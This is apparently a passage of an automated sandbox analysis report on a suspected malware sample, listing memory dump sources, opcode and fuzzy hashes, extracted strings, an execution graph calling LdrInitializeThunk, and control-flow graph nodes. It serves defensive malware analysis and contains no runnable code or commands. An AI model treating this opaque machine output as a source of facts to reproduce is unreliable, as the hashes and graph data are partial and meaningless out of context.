                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 495f2a2ea0073e4fb9c5a538c8ea519d6654104a242c59426c06e6b204728dfc
                                          • Instruction ID: fc65936ff097c46288f21e24655bec22a809f6576860103e3ab88887e0265230
                                          • Opcode Fuzzy Hash: 495f2a2ea0073e4fb9c5a538c8ea519d6654104a242c59426c06e6b204728dfc
                                          • Instruction Fuzzy Hash: DF2192755093808FCB13CF24D990715BFB1EB46214F28C5DAD8498F6A7C33A981ACB62
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.1317998382.000000000300D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0300D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_300d000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
                                          • Instruction ID: a8c346642535598eb7860c23bc5f0c20c8bc82888afd142c0f3a0eceffe8c9dc
                                          • Opcode Fuzzy Hash: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
                                          • Instruction Fuzzy Hash: 0D11D376504240DFDB16CF54D5C4B16FFB1FB84324F28C6AAD8490B656C33AE456CBA2
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.1318046407.000000000301D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0301D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_301d000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
                                          • Instruction ID: 562ef76c47d731fbf98905e425777e1e49d8ccc84ec5d3b3c22b76630cc15427
                                          • Opcode Fuzzy Hash: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
                                          • Instruction Fuzzy Hash: F911DD75504280DFCB12CF10C5C0B25FBB1FB84314F28C6AED8494B696C33AD41ACB61
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.1317998382.000000000300D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0300D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_300d000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1bb1ed62bfa79cd7a8b7d030df93d7c5f3515d8f24e6165d2992e4a0f64cac5b
                                          • Instruction ID: dd012bd98dd67028e10025bc19b55442dccb6691ba36402ca8f977cdae85c012
                                          • Opcode Fuzzy Hash: 1bb1ed62bfa79cd7a8b7d030df93d7c5f3515d8f24e6165d2992e4a0f64cac5b
                                          • Instruction Fuzzy Hash: 4D01A7715067449BF710CE65CD8476BFBD8EF81264F18C85AED0D4E1C2E6799840CA72
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.1317998382.000000000300D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0300D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_300d000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: aadec7af0bd289647e726bea1476d54031a45a54a1d39c5a51f353d0b37023c3
                                          • Instruction ID: 217ad1659a803fc93935d9861069903f717b40f69ad1f07552b17e7506a12927
                                          • Opcode Fuzzy Hash: aadec7af0bd289647e726bea1476d54031a45a54a1d39c5a51f353d0b37023c3
                                          • Instruction Fuzzy Hash: 02F0C2724053449FF7208E15CD84B67FBD8EB81234F28C45AED0C0F282D2789840CA71

                                          Execution Graph

                                          Execution Coverage:17.2%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:0%
                                          Total number of Nodes:33
                                          Total number of Limit Nodes:4
                                          execution_graph 21067 56be2a8 21068 56be2a9 21067->21068 21072 7032962 21068->21072 21079 7032970 21068->21079 21069 56be353 21073 7032930 21072->21073 21075 703296a 21072->21075 21073->21069 21074 7032a5e 21074->21069 21075->21074 21085 70397b0 21075->21085 21091 7039b94 21075->21091 21097 7039590 21075->21097 21080 7032992 21079->21080 21081 7032a5e 21080->21081 21082 70397b0 2 API calls 21080->21082 21083 7039590 LdrInitializeThunk 21080->21083 21084 7039b94 2 API calls 21080->21084 21081->21069 21082->21081 21083->21081 21084->21081 21087 70397e1 21085->21087 21086 7039941 21086->21074 21087->21086 21088 7039b8c LdrInitializeThunk 21087->21088 21090 7039590 LdrInitializeThunk 21087->21090 21088->21086 21090->21087 21094 7039a4b 21091->21094 21092 7039b8c LdrInitializeThunk 21095 7039ce9 21092->21095 21094->21092 21096 7039590 LdrInitializeThunk 21094->21096 21095->21074 21096->21094 21098 70395a2 21097->21098 21100 70395a7 21097->21100 21098->21074 21099 7039cd1 LdrInitializeThunk 21099->21098 21100->21098 21100->21099 21101 7039ed8 21102 7039f05 21101->21102 21103 7039590 LdrInitializeThunk 21102->21103 21104 703bde7 21102->21104 21106 703a20e 21102->21106 21103->21106 21105 7039590 LdrInitializeThunk 21105->21106 21106->21104 21106->21105

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 220 56b7f18-56b7f3b 221 56b7f3d-56b7f43 220->221 222 56b7f46-56b7f66 220->222 221->222 225 56b7f68 222->225 226 56b7f6d-56b7f74 222->226 227 56b82fc-56b8305 225->227 228 56b7f76-56b7f81 226->228 229 56b830d-56b831d 228->229 230 56b7f87-56b7f9a 228->230 233 56b7f9c-56b7faa 230->233 234 56b7fb0-56b7fcb 230->234 233->234 237 56b8284-56b828b 233->237 238 56b7fef-56b7ff2 234->238 239 56b7fcd-56b7fd3 234->239 237->227 242 56b828d-56b828f 237->242 243 56b7ff8-56b7ffb 238->243 244 56b814c-56b8152 238->244 240 56b7fdc-56b7fdf 239->240 241 56b7fd5 239->241 246 56b8012-56b8018 240->246 247 56b7fe1-56b7fe4 240->247 241->240 241->244 245 56b823e-56b8241 241->245 241->246 248 56b829e-56b82a4 242->248 249 56b8291-56b8296 242->249 243->244 251 56b8001-56b8007 243->251 244->245 250 56b8158-56b815d 244->250 256 56b8308 245->256 257 56b8247-56b824d 245->257 258 56b801a-56b801c 246->258 259 56b801e-56b8020 246->259 252 56b7fea 247->252 253 56b807e-56b8084 247->253 248->229 254 56b82a6-56b82ab 248->254 249->248 250->245 251->244 255 56b800d 251->255 252->245 253->245 265 56b808a-56b8090 253->265 263 56b82ad-56b82b2 254->263 264 56b82f0-56b82f3 254->264 255->245 256->229 260 56b824f-56b8257 257->260 261 56b8272-56b8276 257->261 262 56b802a-56b8033 258->262 259->262 260->229 268 56b825d-56b826c 260->268 261->237 271 56b8278-56b827e 261->271 269 56b8046-56b806e 262->269 270 56b8035-56b8040 262->270 263->256 273 56b82b4 263->273 264->256 272 56b82f5-56b82fa 264->272 266 56b8092-56b8094 265->266 267 56b8096-56b8098 265->267 274 56b80a2-56b80b9 266->274 267->274 268->234 268->261 293 56b8162-56b8198 269->293 294 56b8074-56b8079 269->294 270->245 270->269 271->228 271->237 272->227 272->242 275 56b82bb-56b82c0 273->275 286 56b80bb-56b80d4 274->286 287 56b80e4-56b810b 274->287 276 56b82e2-56b82e4 275->276 277 56b82c2-56b82c4 275->277 276->256 284 56b82e6-56b82e9 276->284 281 56b82d3-56b82d9 277->281 282 56b82c6-56b82cb 277->282 281->229 285 56b82db-56b82e0 281->285 282->281 284->264 285->276 289 56b82b6-56b82b9 285->289 286->293 298 56b80da-56b80df 286->298 287->256 297 56b8111-56b8114 287->297 289->256 289->275 301 56b819a-56b819e 293->301 302 56b81a5-56b81ad 293->302 294->293 297->256 300 56b811a-56b8143 297->300 298->293 300->293 317 56b8145-56b814a 300->317 303 56b81bd-56b81c1 301->303 304 56b81a0-56b81a3 301->304 302->256 305 56b81b3-56b81b8 302->305 306 56b81c3-56b81c9 303->306 307 56b81e0-56b81e4 303->307 304->302 304->303 305->245 306->307 309 56b81cb-56b81d3 306->309 310 56b81ee-56b820d call 56b86ae 307->310 311 56b81e6-56b81ec 307->311 309->256 312 56b81d9-56b81de 309->312 314 56b8213-56b8217 310->314 311->310 311->314 312->245 314->245 315 56b8219-56b8235 314->315 315->245 317->293
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (oq$(oq$,q$,q
                                          • API String ID: 0-620556200
                                          • Opcode ID: 25156ef9f6ec5107a9872a962ed830b2bc9b7cbad160f89a1d2eb1a9e953db23
                                          • Instruction ID: b0df49f8d9680cf9cc6877549ddd8d21fca3e1429623ecb9f17aaad1d94f583b
                                          • Opcode Fuzzy Hash: 25156ef9f6ec5107a9872a962ed830b2bc9b7cbad160f89a1d2eb1a9e953db23
                                          • Instruction Fuzzy Hash: 2FD1F970A04219DFEF14CFA9C884AEDBBBABF89340F158165E815AB761D770DD81CB50

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 319 56b29ec-56b29f6 321 56b29f8-56b2a3b 319->321 322 56b2981-56b2999 319->322 328 56b2a5d-56b2aac 321->328 329 56b2a3d-56b2a5c 321->329 326 56b29a0-56b29c8 322->326 333 56b2aae-56b2ab5 328->333 334 56b2ac7-56b2acf 328->334 335 56b2abe-56b2ac5 333->335 336 56b2ab7-56b2abc 333->336 337 56b2ad2-56b2ae6 334->337 335->337 336->337 340 56b2ae8-56b2aef 337->340 341 56b2afc-56b2b04 337->341 342 56b2af1-56b2af3 340->342 343 56b2af5-56b2afa 340->343 344 56b2b06-56b2b0a 341->344 342->344 343->344 346 56b2b6a-56b2b6d 344->346 347 56b2b0c-56b2b21 344->347 348 56b2b6f-56b2b84 346->348 349 56b2bb5-56b2bbb 346->349 347->346 354 56b2b23-56b2b26 347->354 348->349 356 56b2b86-56b2b8a 348->356 351 56b2bc1-56b2bc3 349->351 352 56b36b6 349->352 351->352 355 56b2bc9-56b2bce 351->355 359 56b36bb-56b3878 352->359 357 56b2b28-56b2b2a 354->357 358 56b2b45-56b2b63 call 56b02c8 354->358 360 56b3664-56b3668 355->360 361 56b2bd4 355->361 364 56b2b8c-56b2b90 356->364 365 56b2b92-56b2bb0 call 56b02c8 356->365 357->358 366 56b2b2c-56b2b2f 357->366 358->346 380 56b38aa-56b38c4 359->380 381 56b387a-56b3881 359->381 362 56b366a-56b366d 360->362 363 56b366f-56b36b5 360->363 361->360 362->359 362->363 364->349 364->365 365->349 366->346 369 56b2b31-56b2b43 366->369 369->346 369->358 383 56b38f6-56b3910 380->383 384 56b38c6-56b38d0 380->384 381->380 386 56b3942-56b3969 383->386 387 56b3912-56b3919 383->387 384->383 387->386
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Xq$Xq$Xq$Xq
                                          • API String ID: 0-3965792415
                                          • Opcode ID: 2d5ec1ee5696337f707f2824021e2cea9c27fb93ba043f59fa9a2866b1c1c1e4
                                          • Instruction ID: c0ca4bc53de1d2952a491cce28ea3b2ddcaf73929ba14800e8f1b84f877507e2
                                          • Opcode Fuzzy Hash: 2d5ec1ee5696337f707f2824021e2cea9c27fb93ba043f59fa9a2866b1c1c1e4
                                          • Instruction Fuzzy Hash: EDD1A13175430E8BEB16CF38D692B99FFB5BB94300F54686AD0059B3A1DA70D6C1CB52
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (oq$4'q
                                          • API String ID: 0-1336004174
                                          • Opcode ID: e30e1efde93ff04da0b55b1415467c2668e37000911f513a23481a3ec9212a8c
                                          • Instruction ID: d099bfcbe4b8f963edc9d3d88029d86731d3ce9e00f06c745723d27b159345b7
                                          • Opcode Fuzzy Hash: e30e1efde93ff04da0b55b1415467c2668e37000911f513a23481a3ec9212a8c
                                          • Instruction Fuzzy Hash: 6E827B71A00209DFDB15CFA8C984AEEBBF6FF48300F158599E8069B365D7B0E981CB55

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1999 56b77a0-56b77a2 2000 56b77a9 1999->2000 2001 56b77a4 1999->2001 2002 56b77ac-56b77ad 2000->2002 2003 56b77b1-56b77e6 2000->2003 2001->2000 2002->2003 2004 56b77ec-56b77fa 2003->2004 2005 56b7db1-56b7dc2 2003->2005 2008 56b7828-56b7839 2004->2008 2009 56b77fc-56b780d 2004->2009 2010 56b7dc9-56b7dcc 2005->2010 2011 56b7dc4-56b7dc6 2005->2011 2012 56b783b-56b783f 2008->2012 2013 56b78aa-56b78be 2008->2013 2009->2008 2019 56b780f-56b781b 2009->2019 2015 56b7dcd-56b7e0c call 56b7f18 2010->2015 2014 56b7dc8 2011->2014 2011->2015 2017 56b785a-56b7863 2012->2017 2018 56b7841-56b784d 2012->2018 2149 56b78c1 call 56b7dc8 2013->2149 2150 56b78c1 call 56b77a0 2013->2150 2014->2010 2026 56b7e0e-56b7e12 2015->2026 2027 56b7e5c-56b7e60 2015->2027 2023 56b7869-56b786c 2017->2023 2024 56b7b6c 2017->2024 2021 56b7bdb-56b7c26 2018->2021 2022 56b7853-56b7855 2018->2022 2028 56b7b71-56b7bd4 2019->2028 2029 56b7821-56b7823 2019->2029 2020 56b78c7-56b78cd 2030 56b78cf-56b78d1 2020->2030 2031 56b78d6-56b78dd 2020->2031 2103 56b7c2d-56b7cac 2021->2103 2032 56b7b62-56b7b69 2022->2032 2023->2024 2033 56b7872-56b7891 2023->2033 2024->2028 2034 56b7e21-56b7e28 2026->2034 2035 56b7e14-56b7e19 2026->2035 2038 56b7e62-56b7e71 2027->2038 2039 56b7e77-56b7e8b 2027->2039 2028->2021 2029->2032 2030->2032 2036 56b79cb-56b79dc 2031->2036 2037 56b78e3-56b78fa 2031->2037 2033->2024 2064 56b7897-56b789d 2033->2064 2042 56b7efe-56b7f13 2034->2042 2043 56b7e2e-56b7e35 2034->2043 2035->2034 2055 56b79de-56b79eb 2036->2055 2056 56b7a06-56b7a0c 2036->2056 2037->2036 2062 56b7900-56b790c 2037->2062 2045 56b7e9d-56b7ea7 2038->2045 2046 56b7e73-56b7e75 2038->2046 2041 56b7e93-56b7e9a 2039->2041 2151 56b7e8d call 56baa78 2039->2151 2152 56b7e8d call 56baad8 2039->2152 2153 56b7e8d call 56ba7c0 2039->2153 2043->2027 2052 56b7e37-56b7e3b 2043->2052 2050 56b7ea9-56b7eaf 2045->2050 2051 56b7eb1-56b7eb5 2045->2051 2046->2041 2058 56b7ebd-56b7ef7 2050->2058 2051->2058 2059 56b7eb7 2051->2059 2060 56b7e4a-56b7e51 2052->2060 2061 56b7e3d-56b7e42 2052->2061 2067 56b7a27-56b7a2d 2055->2067 2079 56b79ed-56b79f9 2055->2079 2066 56b7a0e-56b7a1a 2056->2066 2056->2067 2058->2042 2059->2058 2060->2042 2068 56b7e57-56b7e5a 2060->2068 2061->2060 2069 56b7912-56b797e 2062->2069 2070 56b79c4-56b79c6 2062->2070 2064->2005 2072 56b78a3-56b78a7 2064->2072 2074 56b7cc3-56b7d26 2066->2074 2075 56b7a20-56b7a22 2066->2075 2077 56b7b5f 2067->2077 2078 56b7a33-56b7a50 2067->2078 2068->2041 2106 56b79ac-56b79c1 2069->2106 2107 56b7980-56b79aa 2069->2107 2070->2032 2072->2013 2129 56b7d2d-56b7dac 2074->2129 2075->2032 2077->2032 2078->2024 2095 56b7a56-56b7a59 2078->2095 2084 56b79ff-56b7a01 2079->2084 2085 56b7cb1-56b7cbc 2079->2085 2084->2032 2085->2074 2095->2005 2098 56b7a5f-56b7a85 2095->2098 2098->2077 2110 56b7a8b-56b7a97 2098->2110 2106->2070 2107->2106 2113 56b7b5b-56b7b5d 2110->2113 2114 56b7a9d-56b7b15 2110->2114 2113->2032 2132 56b7b43-56b7b58 2114->2132 2133 56b7b17-56b7b41 2114->2133 2132->2113 2133->2132 2149->2020 2150->2020 2151->2041 2152->2041 2153->2041
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (oq$Hq
                                          • API String ID: 0-2917151738
                                          • Opcode ID: 1bde667ac8acaa622c055774f18d398c1118b5a89b62a179c438604383024efe
                                          • Instruction ID: cb68504b5a77bf7f444b62344670dbbc4190c879972c2a97666b8e9d79380c04
                                          • Opcode Fuzzy Hash: 1bde667ac8acaa622c055774f18d398c1118b5a89b62a179c438604383024efe
                                          • Instruction Fuzzy Hash: 72126D70A002198FEB14DF69D854BAEBBB6FFC8300F148569E5069B395DB74DD82CB90

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2155 56b3e09-56b3e16 2156 56b3e18-56b3e1c 2155->2156 2157 56b3e1d-56b3e25 2155->2157 2156->2157 2158 56b3e2e-56b3e3e 2157->2158 2159 56b3e27-56b3e29 2157->2159 2161 56b3e40 2158->2161 2162 56b3e45-56b3e55 2158->2162 2160 56b40cc-56b40d3 2159->2160 2161->2160 2164 56b3e5b-56b3e69 2162->2164 2165 56b40b3-56b40c1 2162->2165 2168 56b3e6f 2164->2168 2169 56b40d4-56b4196 2164->2169 2165->2169 2170 56b40c3-56b40c7 call 56b02c8 2165->2170 2168->2169 2171 56b400e-56b4034 2168->2171 2172 56b3e8d-56b3eae 2168->2172 2173 56b3f4c-56b3f6d 2168->2173 2174 56b3fcc-56b4009 2168->2174 2175 56b3f00-56b3f21 2168->2175 2176 56b4067-56b4082 call 56b02d8 2168->2176 2177 56b40a7-56b40b1 2168->2177 2178 56b3f26-56b3f47 2168->2178 2179 56b4084-56b40a5 call 56b28f0 2168->2179 2180 56b3eda-56b3efb 2168->2180 2181 56b4039-56b4065 2168->2181 2182 56b3f9f-56b3fc7 2168->2182 2183 56b3eb3-56b3ed5 2168->2183 2184 56b3f72-56b3f9a 2168->2184 2185 56b3e76-56b3e88 2168->2185 2239 56b4198-56b419a 2169->2239 2240 56b419d-56b419f 2169->2240 2170->2160 2171->2160 2172->2160 2173->2160 2174->2160 2175->2160 2176->2160 2177->2160 2178->2160 2179->2160 2180->2160 2181->2160 2182->2160 2183->2160 2184->2160 2185->2160 2241 56b41a1-56b41ba 2239->2241 2242 56b419c 2239->2242 2240->2241 2243 56b41bc 2241->2243 2244 56b41c1-56b42c9 call 56b2358 call 56b2368 call 56b2378 call 56b2388 call 56b02e4 2241->2244 2242->2240 2243->2244 2262 56b42cf-56b435f 2244->2262
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Xq$$q
                                          • API String ID: 0-855381642
                                          • Opcode ID: eedca96ea460efeef96cc1538fa7c0b7dbd983532af37641d08debd6d25c2e6c
                                          • Instruction ID: 1f9c1f94a925e7baac413d0f2982cd2b080f039aceda849dd59069852c93b89d
                                          • Opcode Fuzzy Hash: eedca96ea460efeef96cc1538fa7c0b7dbd983532af37641d08debd6d25c2e6c
                                          • Instruction Fuzzy Hash: 1AF16A74F04208DFEB18DFB9D8546AEBBB3BF88301B149529E406AB355CF359842CB51

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2270 56bc5c0-56bc5d3 2271 56bc5d9-56bc5e2 2270->2271 2272 56bc712-56bc719 2270->2272 2273 56bc5e8-56bc5ec 2271->2273 2274 56bc71c 2271->2274 2275 56bc5ee 2273->2275 2276 56bc606-56bc60d 2273->2276 2277 56bc721-56bc736 2274->2277 2278 56bc5f1-56bc5fc 2275->2278 2276->2272 2279 56bc613-56bc620 2276->2279 2284 56bc738-56bc73c 2277->2284 2285 56bc73d-56bc748 2277->2285 2278->2274 2280 56bc602-56bc604 2278->2280 2279->2272 2283 56bc626-56bc639 2279->2283 2280->2276 2280->2278 2286 56bc63b 2283->2286 2287 56bc63e-56bc646 2283->2287 2284->2285 2288 56bc74a-56bc762 2285->2288 2289 56bc774 2285->2289 2286->2287 2291 56bc648-56bc64e 2287->2291 2292 56bc6b3-56bc6b5 2287->2292 2300 56bc76b-56bc76e 2288->2300 2301 56bc764-56bc769 2288->2301 2290 56bc776-56bc77a 2289->2290 2291->2292 2294 56bc650-56bc656 2291->2294 2292->2272 2293 56bc6b7-56bc6bd 2292->2293 2293->2272 2296 56bc6bf-56bc6c9 2293->2296 2294->2277 2297 56bc65c-56bc674 2294->2297 2296->2277 2298 56bc6cb-56bc6e3 2296->2298 2309 56bc6a1-56bc6a4 2297->2309 2310 56bc676-56bc67c 2297->2310 2314 56bc708-56bc70b 2298->2314 2315 56bc6e5-56bc6eb 2298->2315 2303 56bc77b-56bc7b8 2300->2303 2304 56bc770-56bc772 2300->2304 2301->2290 2312 56bc7ba 2303->2312 2313 56bc7bf-56bc89c call 56b41a0 call 56b3cc0 2303->2313 2304->2288 2304->2289 2309->2274 2311 56bc6a6-56bc6a9 2309->2311 2310->2277 2316 56bc682-56bc696 2310->2316 2311->2274 2318 56bc6ab-56bc6b1 2311->2318 2312->2313 2333 56bc89e 2313->2333 2334 56bc8a3-56bc8c4 call 56b6050 2313->2334 2314->2274 2317 56bc70d-56bc710 2314->2317 2315->2277 2319 56bc6ed-56bc701 2315->2319 2316->2277 2322 56bc69c 2316->2322 2317->2272 2317->2296 2318->2291 2318->2292 2319->2277 2324 56bc703 2319->2324 2322->2309 2324->2314 2333->2334 2336 56bc8c9-56bc8d4 2334->2336 2337 56bc8db-56bc8df 2336->2337 2338 56bc8d6 2336->2338 2339 56bc8e1-56bc8e2 2337->2339 2340 56bc8e4-56bc8eb 2337->2340 2338->2337 2341 56bc903-56bc947 2339->2341 2342 56bc8ed 2340->2342 2343 56bc8f2-56bc900 2340->2343 2347 56bc9ad-56bc9c4 2341->2347 2342->2343 2343->2341 2349 56bc949-56bc95f 2347->2349 2350 56bc9c6-56bc9eb 2347->2350 2353 56bc989 2349->2353 2354 56bc961-56bc96d 2349->2354 2356 56bc9ed-56bca02 2350->2356 2357 56bca03 2350->2357 2360 56bc98f-56bc9ac 2353->2360 2358 56bc96f-56bc975 2354->2358 2359 56bc977-56bc97d 2354->2359 2356->2357 2363 56bca04 2357->2363 2361 56bc987 2358->2361 2359->2361 2360->2347 2361->2360 2363->2363
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PHq$PHq
                                          • API String ID: 0-1274609152
                                          • Opcode ID: 65f0e52aa7513bbfe16b8aca2c50cadd8a925ed696c8620061c29521919dc50f
                                          • Instruction ID: e9ae44cdfe9f0a9cdaf0230a0788c82272ecb7759c4f4369d3c7a1bcdddcf148
                                          • Opcode Fuzzy Hash: 65f0e52aa7513bbfe16b8aca2c50cadd8a925ed696c8620061c29521919dc50f
                                          • Instruction Fuzzy Hash: FCE1FD74E04219CFEB14CFA9D894A9DBBB2BF49310F1580A9E859AB361DB709D81CF50

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2562 56b5370-56b5376 2563 56b5378-56b537a 2562->2563 2564 56b537d-56b537f 2562->2564 2565 56b537c 2563->2565 2566 56b5381-56b53a0 2563->2566 2564->2566 2565->2564 2567 56b53a2 2566->2567 2568 56b53a7-56b5484 call 56b41a0 call 56b3cc0 2566->2568 2567->2568 2578 56b548b-56b54a9 2568->2578 2579 56b5486 2568->2579 2609 56b54ac call 56b5fc9 2578->2609 2610 56b54ac call 56b5fcd 2578->2610 2611 56b54ac call 56b6041 2578->2611 2612 56b54ac call 56b5fd1 2578->2612 2613 56b54ac call 56b6050 2578->2613 2614 56b54ac call 56b5ff0 2578->2614 2615 56b54ac call 56b5fd5 2578->2615 2579->2578 2580 56b54b2-56b54bd 2581 56b54bf 2580->2581 2582 56b54c4-56b54c8 2580->2582 2581->2582 2583 56b54ca-56b54cb 2582->2583 2584 56b54cd-56b54d4 2582->2584 2585 56b54ec-56b5530 2583->2585 2586 56b54db-56b54e9 2584->2586 2587 56b54d6 2584->2587 2591 56b5596-56b55ad 2585->2591 2586->2585 2587->2586 2593 56b55af-56b55d4 2591->2593 2594 56b5532-56b5548 2591->2594 2600 56b55ec 2593->2600 2601 56b55d6-56b55eb 2593->2601 2597 56b554a-56b5556 2594->2597 2598 56b5572 2594->2598 2602 56b5558-56b555e 2597->2602 2603 56b5560-56b5566 2597->2603 2604 56b5578-56b5595 2598->2604 2601->2600 2605 56b5570 2602->2605 2603->2605 2604->2591 2605->2604 2609->2580 2610->2580 2611->2580 2612->2580 2613->2580 2614->2580 2615->2580
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PHq$PHq
                                          • API String ID: 0-1274609152
                                          • Opcode ID: 0fe1e898f4cae51a735280cbcf95f5a1c93fceb095cc128396541e244e4c30db
                                          • Instruction ID: 71349611615716a334e792bc76fd0f71b2797f01fc29783afb67317baee89179
                                          • Opcode Fuzzy Hash: 0fe1e898f4cae51a735280cbcf95f5a1c93fceb095cc128396541e244e4c30db
                                          • Instruction Fuzzy Hash: 54819074E00218CFEB14CFAAD944ADDBBF2BF89301F148169E419AB365EB749985CF50

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2616 56bcd28-56bcd34 2617 56bcd8d-56bce3c call 56b41a0 call 56b3cc0 2616->2617 2618 56bcd36-56bcd58 2616->2618 2630 56bce3e 2617->2630 2631 56bce43-56bce64 call 56b6050 2617->2631 2619 56bcd5a 2618->2619 2620 56bcd5f-56bcd8c 2618->2620 2619->2620 2620->2617 2630->2631 2633 56bce69-56bce74 2631->2633 2634 56bce7b-56bce7f 2633->2634 2635 56bce76 2633->2635 2636 56bce81-56bce82 2634->2636 2637 56bce84-56bce8b 2634->2637 2635->2634 2638 56bcea3-56bcee7 2636->2638 2639 56bce8d 2637->2639 2640 56bce92-56bcea0 2637->2640 2644 56bcf4d-56bcf64 2638->2644 2639->2640 2640->2638 2646 56bcee9-56bceff 2644->2646 2647 56bcf66-56bcf8b 2644->2647 2651 56bcf29 2646->2651 2652 56bcf01-56bcf0d 2646->2652 2653 56bcf8d-56bcfa2 2647->2653 2654 56bcfa3 2647->2654 2657 56bcf2f-56bcf4c 2651->2657 2655 56bcf0f-56bcf15 2652->2655 2656 56bcf17-56bcf1d 2652->2656 2653->2654 2658 56bcf27 2655->2658 2656->2658 2657->2644 2658->2657
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PHq$PHq
                                          • API String ID: 0-1274609152
                                          • Opcode ID: b9d46e2d82d3e5ceaa11fb129b8ced14cb46092473ca08b9e342c3f1cf47d0f6
                                          • Instruction ID: e81bf294c776abbe9452d74070ff5353e250c9303f4bff68d72c570f93065456
                                          • Opcode Fuzzy Hash: b9d46e2d82d3e5ceaa11fb129b8ced14cb46092473ca08b9e342c3f1cf47d0f6
                                          • Instruction Fuzzy Hash: 7A81B574E00258CFEB14CFA9D854A9DBBF2BF89300F14C06AE419AB365DB745981CF50

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
